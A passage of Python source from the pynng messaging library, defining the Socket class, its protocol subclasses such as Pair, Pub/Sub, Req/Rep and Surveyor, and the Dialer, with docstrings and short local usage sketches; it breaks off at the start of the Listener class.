def __init__(self, option_name, errmsg):
super().__init__(option_name)
self.errmsg = errmsg
def __get__(self, instance, owner):
raise NotImplementedError(self.errmsg)
def __set__(self, instance, value):
raise NotImplementedError(self.errmsg)
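# Hedged usage sketch (not part of the library): the dial/listen/send/recv
# pattern described in the Socket docstring below, using the Pair0 protocol over
# an inproc address. The address string is an arbitrary example.
def _demo_pair0_roundtrip():
    with pynng.Pair0(listen='inproc://_demo_pair0') as s0, \
            pynng.Pair0(dial='inproc://_demo_pair0') as s1:
        s1.send(b'ping')            # bytes, not str (see _ensure_can_send)
        assert s0.recv() == b'ping'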
class Socket:
"""
Open a socket with one of the scalability protocols. This should not be
instantiated directly; instead, one of its subclasses should be used.
There is one subclass per protocol. The available protocols are:
* :class:`Pair0`
* :class:`Pair1`
* :class:`Req0` / :class:`Rep0`
* :class:`Pub0` / :class:`Sub0`
* :class:`Push0` / :class:`Pull0`
* :class:`Surveyor0` / :class:`Respondent0`
* :class:`Bus0`
The socket initializer receives no positional arguments. It accepts the
following keyword arguments, with the same meaning as the :ref:`attributes
<socket-attributes>` described below: ``recv_timeout``, ``send_timeout``,
``recv_buffer_size``, ``send_buffer_size``, ``reconnect_time_min``,
``reconnect_time_max``, and ``name``
To talk to another socket, you have to either :meth:`~Socket.dial`
its address, or :meth:`~Socket.listen` for connections. Then you can
:meth:`~Socket.send` to send data to the remote sockets or
:meth:`~Socket.recv` to receive data from the remote sockets.
Asynchronous versions are available as well, as :meth:`~Socket.asend`
and :meth:`~Socket.arecv`. The supported event loops are :mod:`asyncio`
and `Trio`_. You must ensure that you :meth:`~Socket.close` the socket
when you are finished with it. Sockets can also be used as a context
manager; this is the preferred way to use them when possible.
.. _socket-attributes:
Sockets have the following attributes. Generally, you should set these
attributes before :meth:`~Socket.listen`-ing or
:meth:`~Socket.dial`-ing, or by passing them in as keyword arguments
when creating the :class:`Socket`:
* **recv_timeout** (int): Receive timeout, in ms. If a socket takes longer
than the specified time, raises a ``pynng.exceptions.Timeout``.
Corresponds to library option ``NNG_OPT_RECVTIMEO``
* **send_timeout** (int): Send timeout, in ms. If the message cannot
be queued in the specified time, raises a pynng.exceptions.Timeout.
Corresponds to library option ``NNG_OPT_SENDTIMEO``.
* **recv_max_size** (int): The largest size of a message to receive.
Messages larger than this size will be silently dropped. A size of 0
indicates unlimited size. The default size is 1 MB.
* **recv_buffer_size** (int): The number of messages that the socket
will buffer on receive. Corresponds to ``NNG_OPT_RECVBUF``.
* **send_buffer_size** (int): The number of messages that the socket
will buffer on send. Corresponds to ``NNG_OPT_SENDBUF``.
* **name** (str): The socket name. Corresponds to
``NNG_OPT_SOCKNAME``. This is useful for debugging purposes.
* **raw** (bool): A boolean, indicating whether the socket is raw or cooked.
Returns ``True`` if the socket is raw, else ``False``. This property
is read-only. Corresponds to library option ``NNG_OPT_RAW``. For
more information see `nng's documentation.
<https://nanomsg.github.io/nng/man/v1.0.1/nng.7.html#raw_mode>`_
      Note that currently, pynng does not support ``raw`` mode sockets, but
      we intend to support them `in the future
      <https://github.com/codypiersall/pynng/issues/35>`_.
* **protocol** (int): Read-only option which returns the 16-bit number
of the socket's protocol.
* **protocol_name** (str): Read-only option which returns the name of the
socket's protocol.
* **peer** (int): Returns the peer protocol id for the socket.
* **local_address**: The :class:`~pynng.sockaddr.SockAddr` representing
the local address. Corresponds to ``NNG_OPT_LOCADDR``.
* **reconnect_time_min** (int): The minimum time to wait before
attempting reconnects, in ms. Corresponds to ``NNG_OPT_RECONNMINT``.
This can also be overridden on the dialers.
* **reconnect_time_max** (int): The maximum time to wait before
attempting reconnects, in ms. Corresponds to ``NNG_OPT_RECONNMAXT``.
If this is non-zero, then the time between successive connection
attempts will start at the value of ``reconnect_time_min``, and grow
exponentially, until it reaches this value. This option can be set
on the socket, or on the dialers associated with the socket.
* **recv_fd** (int): The receive file descriptor associated with the
socket. This is suitable to be passed into poll functions like
:func:`select.poll` or :func:`select.select`. That is the only thing
this file descriptor is good for; do not attempt to read from or
write to it. The file descriptor will be marked as **readable**
whenever it can receive data without blocking. Corresponds to
``NNG_OPT_RECVFD``.
* **send_fd** (int): The sending file descriptor associated with the
socket. This is suitable to be passed into poll functions like
:func:`select.poll` or :func:`select.select`. That is the only thing
this file descriptor is good for; do not attempt to read from or
write to it. The file descriptor will be marked as **readable**
whenever it can send data without blocking. Corresponds to
``NNG_OPT_SENDFD``.
.. Note::
When used in :func:`select.poll` or :func:`select.select`,
``recv_fd`` and ``send_fd`` are both marked as **readable** when
they can receive or send data without blocking. So the upshot is
that for :func:`select.select` they should be passed in as the
*rlist* and for :meth:`select.poll.register` the *eventmask*
should be ``POLLIN``.
* **tls_config** (:class:`~pynng.TLSConfig`): The TLS configuration for
this socket. This option is only valid if the socket is using the
TLS transport. See :class:`~pynng.TLSConfig` for information about
the TLS configuration. Corresponds to ``NNG_OPT_TLS_CONFIG``. This
option is write-only.
.. _Trio: https://trio.readthedocs.io
"""
# TODO: Do we need to document ttl_max? We're not supporting nng_device
# yet, so I guess not?
# the following options correspond to nng options documented at
# https://nanomsg.github.io/nng/man/v1.0.1/nng_options.5.html
name = StringOption('socket-name')
raw = BooleanOption('raw')
protocol = IntOption('protocol')
protocol_name = StringOption('protocol-name')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
recv_buffer_size = IntOption('recv-buffer')
send_buffer_size = IntOption('send-buffer')
recv_timeout = MsOption('recv-timeout')
send_timeout = MsOption('send-timeout')
ttl_max = IntOption('ttl-max')
recv_max_size = SizeOption('recv-size-max')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_fd = IntOption('recv-fd')
send_fd = IntOption('send-fd')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
def __init__(self, *,
dial=None,
listen=None,
recv_timeout=None,
send_timeout=None,
recv_buffer_size=None,
send_buffer_size=None,
recv_max_size=None,
reconnect_time_min=None,
reconnect_time_max=None,
opener=None,
block_on_dial=None,
name=None,
tls_config=None,
async_backend=None
):
# mapping of id: Python objects
self._dialers = {}
self._listeners = {}
self._pipes = {}
self._on_pre_pipe_add = []
self._on_post_pipe_add = []
self._on_post_pipe_remove = []
self._pipe_notify_lock = threading.Lock()
self._async_backend = async_backend
self._socket = ffi.new('nng_socket *',)
if opener is not None:
self._opener = opener
if opener is None and not hasattr(self, '_opener'):
raise TypeError('Cannot directly instantiate a Socket. Try a subclass.')
check_err(self._opener(self._socket))
if tls_config is not None:
self.tls_config = tls_config
if recv_timeout is not None:
self.recv_timeout = recv_timeout
if send_timeout is not None:
self.send_timeout = send_timeout
if recv_max_size is not None:
self.recv_max_size = recv_max_size
if reconnect_time_min is not None:
self.reconnect_time_min = reconnect_time_min
if reconnect_time_max is not None:
self.reconnect_time_max = reconnect_time_max
if recv_buffer_size is not None:
self.recv_buffer_size = recv_buffer_size
if send_buffer_size is not None:
self.send_buffer_size = send_buffer_size
if name is not None:
self.name = name
# set up pipe callbacks. This **must** be called before listen/dial to
# avoid race conditions.
handle = ffi.new_handle(self)
self._handle = handle
for event in (lib.NNG_PIPE_EV_ADD_PRE, lib.NNG_PIPE_EV_ADD_POST,
lib.NNG_PIPE_EV_REM_POST):
check_err(lib.nng_pipe_notify(
self.socket, event, lib._nng_pipe_cb, handle))
if listen is not None:
self.listen(listen)
if dial is not None:
self.dial(dial, block=block_on_dial)
def dial(self, address, *, block=None):
"""Dial the specified address.
Args:
address: The address to dial.
block: Whether to block or not. There are three possible values
this can take:
1. If ``True``, a blocking dial is attempted. If it fails for
any reason, the dial fails and an exception is raised.
2. If ``False``, a non-blocking dial is started. The dial is
retried periodically in the background until it is
successful.
3. (**Default behavior**): If ``None``, a blocking dial is
first attempted. If it fails an exception is logged (using
the Python logging module), then a non-blocking dial is
done.
"""
if block:
return self._dial(address, flags=0)
elif block is None:
try:
return self.dial(address, block=True)
except pynng.ConnectionRefused:
msg = 'Synchronous dial failed; attempting asynchronous now'
logger.exception(msg)
return self.dial(address, block=False)
else:
return self._dial(address, flags=lib.NNG_FLAG_NONBLOCK)
def _dial(self, address, flags=0):
"""Dial specified ``address``
``flags`` usually do not need to be given.
"""
dialer = ffi.new('nng_dialer *')
ret = lib.nng_dial(self.socket, to_char(address), dialer, flags)
check_err(ret)
# we can only get here if check_err doesn't raise
d_id = lib.nng_dialer_id(dialer[0])
py_dialer = Dialer(dialer, self)
self._dialers[d_id] = py_dialer
return py_dialer
def listen(self, address, flags=0):
"""Listen at specified address.
        ``flags`` usually does not need to be given.
"""
listener = ffi.new('nng_listener *')
ret = lib.nng_listen(self.socket, to_char(address), listener, flags)
check_err(ret)
# we can only get here if check_err doesn't raise
l_id = lib.nng_listener_id(listener[0])
py_listener = Listener(listener, self)
self._listeners[l_id] = py_listener
return py_listener
def close(self):
"""Close the socket, freeing all system resources."""
# if a TypeError occurs (e.g. a bad keyword to __init__) we don't have
# the attribute _socket yet. This prevents spewing extra exceptions
if hasattr(self, '_socket'):
lib.nng_close(self.socket)
# cleanup the list of listeners/dialers. A program would be likely to
# segfault if a user accessed the listeners or dialers after this
# point.
self._listeners = {}
self._dialers = {}
def __del__(self):
self.close()
@property
def socket(self):
return self._socket[0]
def recv(self, block=True):
"""Receive data on the socket. If the request times out the exception
:class:`pynng.Timeout` is raised. If the socket cannot perform that
operation (e.g., a :class:`Pub0`, which can only
:meth:`~Socket.send`), the exception :class:`pynng.NotSupported`
is raised.
Args:
block: If block is True (the default), the function will not return
until the operation is completed or times out. If block is False,
the function will return data immediately. If no data is ready on
the socket, the function will raise ``pynng.TryAgain``.
"""
# TODO: someday we should support some kind of recv_into() operation
# where the user provides the data buffer.
flags = lib.NNG_FLAG_ALLOC
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
data = ffi.new('char **')
size_t = ffi.new('size_t *')
ret = lib.nng_recv(self.socket, data, size_t, flags)
check_err(ret)
recvd = ffi.unpack(data[0], size_t[0])
lib.nng_free(data[0], size_t[0])
return recvd
def send(self, data, block=True):
"""Sends ``data`` on socket.
Args:
data: either ``bytes`` or ``bytearray``
block: If block is True (the default), the function will
not return until the operation is completed or times out.
If block is False, the function will raise ``pynng.TryAgain``
immediately if no data was sent.
"""
_ensure_can_send(data)
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
err = lib.nng_send(self.socket, data, len(data), flags)
check_err(err)
async def arecv(self):
"""The asynchronous version of :meth:`~Socket.recv`"""
with _aio.AIOHelper(self, self._async_backend) as aio:
return await aio.arecv()
async def asend(self, data):
"""Asynchronous version of :meth:`~Socket.send`."""
_ensure_can_send(data)
with _aio.AIOHelper(self, self._async_backend) as aio:
return await aio.asend(data)
def __enter__(self):
return self
def __exit__(self, *tb_info):
self.close()
@property
def dialers(self):
"""A list of the active dialers"""
return tuple(self._dialers.values())
@property
def listeners(self):
"""A list of the active listeners"""
return tuple(self._listeners.values())
@property
def pipes(self):
"""A list of the active pipes"""
return tuple(self._pipes.values())
def _add_pipe(self, lib_pipe):
# this is only called inside the pipe callback.
pipe_id = lib.nng_pipe_id(lib_pipe)
# If the pipe already exists in the Socket, don't create a new one
if pipe_id not in self._pipes:
pipe = Pipe(lib_pipe, self)
self._pipes[pipe_id] = pipe
return self._pipes[pipe_id]
def _remove_pipe(self, lib_pipe):
pipe_id = lib.nng_pipe_id(lib_pipe)
del self._pipes[pipe_id]
def new_context(self):
"""Return a new :class:`Context` for this socket."""
return Context(self)
def add_pre_pipe_connect_cb(self, callback):
"""
Add a callback which will be called before a Pipe is connected to a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a Pipe. The
socket associated with the pipe can be accessed through the pipe's
``socket`` attribute. If the pipe is closed, the callbacks for
post_pipe_connect and post_pipe_remove will not be called.
"""
self._on_pre_pipe_add.append(callback)
def add_post_pipe_connect_cb(self, callback):
"""
Add a callback which will be called after a Pipe is connected to a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a :class:`Pipe`.
"""
self._on_post_pipe_add.append(callback)
def add_post_pipe_remove_cb(self, callback):
"""
Add a callback which will be called after a Pipe is removed from a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a :class:`Pipe`.
"""
self._on_post_pipe_remove.append(callback)
def remove_pre_pipe_connect_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for pre pipe connect
events
"""
self._on_pre_pipe_add.remove(callback)
def remove_post_pipe_connect_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for post pipe connect
events
"""
self._on_post_pipe_add.remove(callback)
def remove_post_pipe_remove_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for post pipe remove
events
"""
self._on_post_pipe_remove.remove(callback)
def _try_associate_msg_with_pipe(self, msg):
""" Looks up the nng_msg associated with the ``msg`` and attempts to
set it on the Message ``msg``
"""
# Wrap pipe handling inside the notify lock since we can create
# a new Pipe and associate it with the Socket if the callbacks
# haven't been called yet. This will ensure there's no race
# condition with the pipe callbacks.
with self._pipe_notify_lock:
lib_pipe = lib.nng_msg_get_pipe(msg._nng_msg)
pipe_id = lib.nng_pipe_id(lib_pipe)
try:
msg.pipe = self._pipes[pipe_id]
except KeyError:
# A message may have been received before the pipe callback was called.
# Create a new Pipe and associate it with the Socket.
                # When the callback eventually runs, it will detect that the pipe already exists.
# if pipe_id < 0, that *probably* means we hit a race where the
# associated pipe was closed.
if pipe_id >= 0:
# Add the pipe to the socket
msg.pipe = self._add_pipe(lib_pipe)
def recv_msg(self, block=True):
"""Receive a :class:`Message` on the socket."""
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
msg_p = ffi.new('nng_msg **')
check_err(lib.nng_recvmsg(self.socket, msg_p, flags))
msg = msg_p[0]
msg = Message(msg)
self._try_associate_msg_with_pipe(msg)
return msg
def send_msg(self, msg, block=True):
"""Send the :class:`Message` ``msg`` on the socket.
.. Note::
            It may be more convenient to call :meth:`Pipe.send` than this
method.
"""
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
with msg._mem_freed_lock:
msg._ensure_can_send()
check_err(lib.nng_sendmsg(self.socket, msg._nng_msg, flags))
msg._mem_freed = True
async def asend_msg(self, msg):
"""
Asynchronously send the :class:`Message` ``msg`` on the socket.
"""
with msg._mem_freed_lock:
msg._ensure_can_send()
with _aio.AIOHelper(self, self._async_backend) as aio:
# Note: the aio helper sets the _mem_freed flag on the msg
return await aio.asend_msg(msg)
async def arecv_msg(self):
"""
Asynchronously receive the :class:`Message` ``msg`` on the socket.
"""
with _aio.AIOHelper(self, self._async_backend) as aio:
msg = await aio.arecv_msg()
self._try_associate_msg_with_pipe(msg)
return msg
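
# Minimal usage sketch of the blocking/non-blocking behavior described in the
# recv()/send() docstrings above.  The tcp address and port are arbitrary
# placeholders chosen for illustration.
def _example_nonblocking_recv():
    import pynng

    addr = 'tcp://127.0.0.1:13131'  # arbitrary local address for this sketch
    with pynng.Pair0(listen=addr) as s0, pynng.Pair0(dial=addr) as s1:
        try:
            # nothing has been sent yet, so a non-blocking recv raises
            # pynng.TryAgain instead of waiting
            s0.recv(block=False)
        except pynng.TryAgain:
            pass
        s1.send(b'hello')    # blocking send (the default)
        print(s0.recv())     # blocking recv returns b'hello'
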
class Bus0(Socket):
"""A bus0 socket. The Python version of `nng_bus
<https://nanomsg.github.io/nng/man/tip/nng_bus.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`.
A :class:`Bus0` socket sends a message to all directly connected peers.
This enables creating mesh networks. Note that messages are only sent to
*directly* connected peers. You must explicitly connect all nodes with the
    :meth:`~Socket.listen` and corresponding :meth:`~Socket.dial` calls.
Here is a demonstration of using the bus protocol:
.. literalinclude:: snippets/bus0_sync.py
:language: python3
"""
_opener = lib.nng_bus0_open
class Pair0(Socket):
"""A socket for bidrectional, one-to-one communication, with a single
partner. The Python version of `nng_pair0
<https://nanomsg.github.io/nng/man/tip/nng_pair.7>`_.
This is the most basic type of socket.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`.
This demonstrates the synchronous API:
.. literalinclude:: snippets/pair0_sync.py
:language: python3
This demonstrates the asynchronous API using `Trio`_. Remember that
:mod:`asyncio` is also supported.
.. literalinclude:: snippets/pair0_async.py
:language: python3
"""
_opener = lib.nng_pair0_open
class Pair1(Socket):
"""A socket for bidrectional communication with potentially many peers.
The Python version of `nng_pair1
<https://nanomsg.github.io/nng/man/tip/nng_pair.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`. It also has one extra
keyword-only argument, ``polyamorous``, which must be set to ``True`` to
connect with more than one peer.
.. Warning::
If you want to connect to multiple peers you **must** pass
``polyamorous=True`` when you create your socket. ``polyamorous`` is a
read-only attribute of the socket and cannot be changed after creation.
.. Warning::
Pair1 was an experimental feature in nng, and is currently deprecated.
It will likely be removed in the future; see `nng's docs
<https://nng.nanomsg.org/man/v1.3.2/nng_pair_open.3.html>`_ for
details.
To get the benefits of polyamory, you need to use the methods that work
with :class:`Message` objects: :meth:`Socket.recv_msg` and
:meth:`Socket.arecv_msg` for receiving, and :meth:`Pipe.send`
and :meth:`Pipe.asend` for sending.
Here is an example of the synchronous API, where a single listener connects
to multiple peers. This is more complex than the :class:`Pair0` case,
    because it requires using the :class:`Pipe` and :class:`Message`
interfaces.
.. literalinclude:: snippets/pair1_sync.py
And here is an example using the async API, using `Trio`_.
.. literalinclude:: snippets/pair1_async.py
"""
def __init__(self, *, polyamorous=False, **kwargs):
# make sure we don't listen/dial before setting polyamorous, so we pop
# them out of kwargs, then do the dial/listen below.
# It's not beautiful, but it will work.
dial_addr = kwargs.pop('dial', None)
        listen_addr = kwargs.pop('listen', None)
super().__init__(**kwargs)
if polyamorous:
self._opener = lib.nng_pair1_open_poly
else:
self._opener = lib.nng_pair1_open
# now we can do the listen/dial
if dial_addr is not None:
self.dial(dial_addr, block=kwargs.get('block_on_dial'))
if listen_addr is not None:
self.listen(listen_addr)
_opener = lib.nng_pair1_open_poly
polyamorous = BooleanOption('pair1:polyamorous')
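
# Minimal usage sketch of the polyamorous workflow described in the Pair1
# docstring: recv_msg() to learn which pipe a message arrived on, and
# Pipe.send() to answer that specific peer.  The tcp address/port are
# arbitrary placeholders chosen for illustration.
def _example_pair1_polyamorous():
    import pynng

    addr = 'tcp://127.0.0.1:13132'  # arbitrary local address for this sketch
    with pynng.Pair1(listen=addr, polyamorous=True) as hub, \
            pynng.Pair1(dial=addr, polyamorous=True) as alice, \
            pynng.Pair1(dial=addr, polyamorous=True) as bob:
        alice.send(b'hello from alice')
        bob.send(b'hello from bob')
        for _ in range(2):
            msg = hub.recv_msg()                 # the Message records its pipe
            msg.pipe.send(b'ack: ' + msg.bytes)  # reply to that specific peer
        print(alice.recv())   # b'ack: hello from alice'
        print(bob.recv())     # b'ack: hello from bob'
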
class Push0(Socket):
"""A push0 socket.
The Python version of `nng_push
<https://nanomsg.github.io/nng/man/tip/nng_push.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Push0` socket is the pushing end of a data pipeline. Data sent
from a push socket will be sent to a *single* connected :class:`Pull0`
socket. This can be useful for distributing work to multiple nodes, for
example. Attempting to call :meth:`~Socket.recv()` on a Push0 socket
will raise a :class:`pynng.NotSupported` exception.
Here is an example of two :class:`Pull0` sockets connected to a
:class:`Push0` socket.
.. literalinclude:: snippets/pushpull_sync.py
"""
_opener = lib.nng_push0_open
class Pull0(Socket):
"""A pull0 socket.
The Python version of `nng_pull
<https://nanomsg.github.io/nng/man/tip/nng_pull.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Pull0` is the receiving end of a data pipeline. It needs to be
paired with a :class:`Push0` socket.
Attempting to :meth:`~Socket.send()`
with a Pull0 socket will raise a :class:`pynng.NotSupported` exception.
See :class:`Push0` for an example of push/pull in action.
"""
_opener = lib.nng_pull0_open
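
# Minimal usage sketch of the pipeline pattern described in the Push0/Pull0
# docstrings.  The tcp address and port are arbitrary placeholders chosen for
# illustration.
def _example_push_pull():
    import pynng

    addr = 'tcp://127.0.0.1:13133'  # arbitrary local address for this sketch
    with pynng.Push0(listen=addr) as push, pynng.Pull0(dial=addr) as pull:
        push.send(b'work item 1')
        print(pull.recv())  # b'work item 1'
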
class Pub0(Socket):
"""A pub0 socket.
The Python version of `nng_pub
<https://nanomsg.github.io/nng/man/tip/nng_pub.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
    same :ref:`attributes <socket-attributes>`.  When a :class:`Pub0` socket
    calls :meth:`~Socket.send`, the data is published to all connected
:class:`subscribers <Sub0>`.
Attempting to :meth:`~Socket.recv` with a Pub0 socket will raise a
:class:`pynng.NotSupported` exception.
See docs for :class:`Sub0` for an example.
"""
_opener = lib.nng_pub0_open
class Sub0(Socket):
"""A sub0 socket.
The Python version of `nng_sub
<https://nanomsg.github.io/nng/man/tip/nng_sub.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It also has one
additional keyword argument: ``topics``. If ``topics`` is given, it must
be either a :class:`str`, :class:`bytes`, or an iterable of str and bytes.
A subscriber must :meth:`~Sub0.subscribe` to specific topics, and only
messages that match the topic will be received. A subscriber can subscribe
    to as many topics as needed.
A match is determined if the message starts with one of the subscribed
topics. So if the subscribing socket is subscribed to the topic
    ``b'hel'``, then the messages ``b'hel'``, ``b'help him'`` and ``b'hello'``
would match, but the message ``b'hexagon'`` would not. Subscribing to an
empty string (``b''``) means that all messages will match. If a sub socket
    is not subscribed to any topics, no messages will be received.
.. Note ::
pub/sub is a "best effort" transport; if you have a very high volume of
messages be prepared for some messages to be silently dropped.
Attempting to :meth:`~Socket.send` with a Sub0 socket will raise a
:class:`pynng.NotSupported` exception.
The following example demonstrates a basic usage of pub/sub:
.. literalinclude:: snippets/pubsub_sync.py
"""
_opener = lib.nng_sub0_open
def __init__(self, *, topics=None, **kwargs):
super().__init__(**kwargs)
if topics is None:
return
# special-case str/bytes
if isinstance(topics, (str, bytes)):
topics = [topics]
for topic in topics:
self.subscribe(topic)
def subscribe(self, topic):
"""Subscribe to the specified topic.
Topics are matched by looking at the first bytes of any received
message.
.. Note::
If you pass a :class:`str` as the ``topic``, it will be
automatically encoded with :meth:`str.encode`. If this is not the
desired behavior, just pass :class:`bytes` in as the topic.
"""
options._setopt_string(self, b'sub:subscribe', topic)
def unsubscribe(self, topic):
"""Unsubscribe to the specified topic.
.. Note::
If you pass a :class:`str` as the ``topic``, it will be
automatically encoded with :meth:`str.encode`. If this is not the
desired behavior, just pass :class:`bytes` in as the topic.
"""
options._setopt_string(self, b'sub:unsubscribe', topic)
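
# Minimal usage sketch of the topic-prefix matching described in the Sub0
# docstring.  The tcp address/port, the short settle delay, and the receive
# timeout are assumptions of this sketch, not requirements of the API.
def _example_pubsub_topic_matching():
    import time
    import pynng

    addr = 'tcp://127.0.0.1:13134'  # arbitrary local address for this sketch
    with pynng.Pub0(listen=addr) as pub, \
            pynng.Sub0(dial=addr, topics='hel') as sub:
        time.sleep(0.1)           # give the new pipe a moment to settle
        sub.recv_timeout = 250    # milliseconds, so the last recv() can't hang
        pub.send(b'hello world')  # starts with b'hel' -> delivered
        pub.send(b'hexagon')      # does not start with b'hel' -> filtered out
        print(sub.recv())         # b'hello world'
        try:
            sub.recv()            # nothing else matches the subscription
        except pynng.Timeout:
            pass
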
class Req0(Socket):
"""A req0 socket.
The Python version of `nng_req
<https://nanomsg.github.io/nng/man/tip/nng_req.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It also has one extra
    keyword argument: ``resend_time``.  ``resend_time`` corresponds to
    ``NNG_OPT_REQ_RESENDTIME``.
A :class:`Req0` socket is paired with a :class:`Rep0` socket and together
    they implement normal request/response behavior.  The req socket
:meth:`send()s <Socket.send>` a request, the rep socket :meth:`recv()s
    <Socket.recv>` it, the rep socket :meth:`send()s <Socket.send>` a response,
and the req socket :meth:`recv()s <Socket.recv>` it.
If a req socket attempts to do a :meth:`~Socket.recv` without first doing a
:meth:`~Socket.send`, a :class:`pynng.BadState` exception is raised.
A :class:`Req0` socket supports opening multiple :class:`Contexts
<Context>` by calling :meth:`~Socket.new_context`. In this way a req
socket can have multiple outstanding requests to a single rep socket.
Without opening a :class:`Context`, the socket can only have a single
outstanding request at a time.
Here is an example demonstrating the request/response pattern.
.. literalinclude:: snippets/reqrep_sync.py
"""
resend_time = MsOption('req:resend-time')
_opener = lib.nng_req0_open
def __init__(self, *, resend_time=None, **kwargs):
super().__init__(**kwargs)
if resend_time is not None:
self.resend_time = resend_time
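
# Minimal usage sketch of the request/response exchange described in the
# Req0/Rep0 docstrings.  The tcp address and port are arbitrary placeholders
# chosen for illustration.
def _example_req_rep():
    import pynng

    addr = 'tcp://127.0.0.1:13135'  # arbitrary local address for this sketch
    with pynng.Rep0(listen=addr) as rep, pynng.Req0(dial=addr) as req:
        req.send(b'ping')
        print(rep.recv())   # b'ping'
        rep.send(b'pong')
        print(req.recv())   # b'pong'
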
class Rep0(Socket):
"""A rep0 socket.
The Python version of `nng_rep
<https://nanomsg.github.io/nng/man/tip/nng_rep.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Rep0` socket along with a :class:`Req0` socket implement the
request/response pattern:
the req socket :meth:`send()s <Socket.send>` a
request, the rep socket :meth:`recv()s <Socket.recv>` it, the rep socket
    :meth:`send()s <Socket.send>` a response, and the req socket :meth:`recv()s
<Socket.recv>` it.
A :class:`Rep0` socket supports opening multiple :class:`Contexts
<Context>` by calling :meth:`~Socket.new_context`. In this way a rep
socket can service multiple requests at the same time. Without opening a
:class:`Context`, the rep socket can only service a single request at a
time.
See the documentation for :class:`Req0` for an example.
"""
_opener = lib.nng_rep0_open
class Surveyor0(Socket):
"""A surveyor0 socket.
The Python version of `nng_surveyor
<https://nanomsg.github.io/nng/man/tip/nng_surveyor.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It has one additional
attribute: ``survey_time``. ``survey_time`` sets the amount of time a
survey lasts.
:class:`Surveyor0` sockets work with :class:`Respondent0` sockets in the
survey pattern. In this pattern, a :class:`surveyor <Surveyor0>` sends a
message, and gives all :class:`respondents <Respondent0>` a chance to
chime in. The amount of time a survey is valid is set by the attribute
``survey_time``. ``survey_time`` is the time of a survey in milliseconds.
Here is an example:
.. literalinclude:: snippets/surveyor_sync.py
"""
_opener = lib.nng_surveyor0_open
survey_time = MsOption('surveyor:survey-time')
def __init__(self, *, survey_time=None, **kwargs):
super().__init__(**kwargs)
if survey_time is not None:
self.survey_time = survey_time
class Respondent0(Socket):
"""A respondent0 socket.
The Python version of `nng_respondent
<https://nanomsg.github.io/nng/man/tip/nng_respondent.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It accepts no
    additional arguments and has no other attributes.
:class:`Surveyor0` sockets work with :class:`Respondent0` sockets in the
survey pattern. In this pattern, a :class:`surveyor <Surveyor0>` sends a
message, and gives all :class:`respondents <Respondent0>` a chance to
chime in. The amount of time a survey is valid is set by the attribute
``survey_time``. ``survey_time`` is the time of a survey in milliseconds.
See :class:`Surveyor0` docs for an example.
"""
_opener = lib.nng_respondent0_open
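
# Minimal usage sketch of the survey pattern described in the
# Surveyor0/Respondent0 docstrings.  The tcp address/port, the survey_time
# value, and the short settle delay are assumptions of this sketch.
def _example_survey():
    import time
    import pynng

    addr = 'tcp://127.0.0.1:13136'  # arbitrary local address for this sketch
    with pynng.Surveyor0(listen=addr, survey_time=500) as surveyor, \
            pynng.Respondent0(dial=addr) as respondent:
        time.sleep(0.1)                   # give the new pipe a moment to settle
        surveyor.send(b'are you awake?')  # start the survey
        print(respondent.recv())          # b'are you awake?'
        respondent.send(b'yes')
        print(surveyor.recv())            # b'yes'
        try:
            surveyor.recv()               # no more responses; the survey
        except pynng.Timeout:             # times out after survey_time ms
            pass
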
class Dialer:
"""The Python version of `nng_dialer
<https://nanomsg.github.io/nng/man/tip/nng_dialer.5>`_. A
:class:`Dialer` is returned whenever :meth:`Socket.dial` is called. A list
of active dialers can be accessed via ``Socket.dialers``.
A :class:`Dialer` is associated with a single :class:`Socket`. The
associated socket can be accessed via the ``socket`` attribute. There is
    no public constructor for creating a :class:`Dialer`.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_max_size = SizeOption('recv-size-max')
url = StringOption('url')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
tls_ca_file = StringOption('tls-ca-file')
tls_cert_key_file = StringOption('tls-cert-key-file')
tls_auth_mode = IntOption('tls-authmode')
tls_server_name = StringOption('tls-server-name')
def __init__(self, dialer, socket):
"""
Args:
dialer: the initialized `lib.nng_dialer`.
socket: The Socket associated with the dialer
"""
# I can't think of a reason you would need to directly instantiate this
# class
self._dialer = dialer
self.socket = socket
@property
def dialer(self):
return self._dialer[0]
def close(self):
"""
Close the dialer.
"""
lib.nng_dialer_close(self.dialer)
del self.socket._dialers[self.id]
@property
def id(self):
return lib.nng_dialer_id(self.dialer)
class Listener:
"""The Python version of `nng_listener
<https://nanomsg.github.io/nng/man/tip/nng_listener.5>`_. A
